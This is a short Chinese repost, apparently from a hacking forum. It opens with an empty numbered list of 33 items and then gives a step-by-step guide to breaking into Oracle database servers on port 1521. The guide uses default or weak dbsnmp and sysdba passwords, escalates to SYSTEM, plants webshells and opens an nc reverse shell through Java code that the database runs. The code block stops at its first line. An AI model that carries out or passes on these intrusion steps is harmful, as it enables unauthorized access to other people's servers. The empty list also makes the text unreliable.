无意中看到的，整理了一下转载过来分享给大家。　　1、　　　　2、　　　　3、　　　　4、　　　　5、　　　　6、　　　　7、　　　　8、　　　　9、　　　　10、　　　　11、　　　　12、　　　　13、　　　　14、　　　　15、　　　　16、　　　　17、　　　　18、　　　　19、　　　　20、　　　　21、　　　　22、　　　　23、　　　　24、　　　　25、　　　　26、　　　　27、　　　　28、　　　　29、　　　　30、　　　　31、　　　　32、　　　　33、　　

很多时候对于开放1521端口的Windows下Oracle数据库服务器，因为大多存在默认低权限用户dbsnmp，或者人品爆发高权限的用户 (sysdba)是默认密码或弱口令，由此可以通过Oracle的一些提权漏洞获取Oracle的最高权限，直至得到系统的SYSTEM权限。而 对于Linux下的Oracle数据库入侵，因为Linux下一般Oracle数据库都是以Oracle的独立用户在跑，所以无法获取到root权限。当 然很多WEB和数据库在同一服务器上的时候，可以导出WEBSHELL到WEB目录来获取权限。然而大部分的数据库都是独立跑在一个服务器上，以下用简单 的方式获取Oracle的shell，即采用nc反弹的shell的方式。1、Oracle数据库支持JAVA（如Windows下入侵一般）2、通过Oracle客户端sqlplus，以sysdba用户登录（dbsnmp用户可提权至sysdba）3、执行以下代码：CODE_1:create or replace and resolve java source named "oraexec" as import ja